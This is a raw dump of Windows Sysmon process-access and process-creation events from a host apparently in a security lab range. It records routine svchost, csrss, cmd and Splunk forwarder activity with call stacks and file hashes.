13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-1E01-000000009101}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-85E9-5FCF-1C01-000000009101}13844772C:\Windows\system32\cmd.exe{10ACEC4A-85E9-5FCF-1E01-000000009101}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.274{10ACEC4A-85E9-5FCF-1E01-000000009101}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-85E9-5FCF-1C01-000000009101}1384C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-85E9-5FCF-1D01-000000009101}48121352C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-1C01-000000009101}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.261{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-1D01-000000009101}4812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-1C01-000000009101}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.246{10ACEC4A-85E9-5FCF-1B01-000000009101}18401260C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85E9-5FCF-1C01-000000009101}1384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.258{10ACEC4A-85E9-5FCF-1C01-000000009101}1384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.012{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 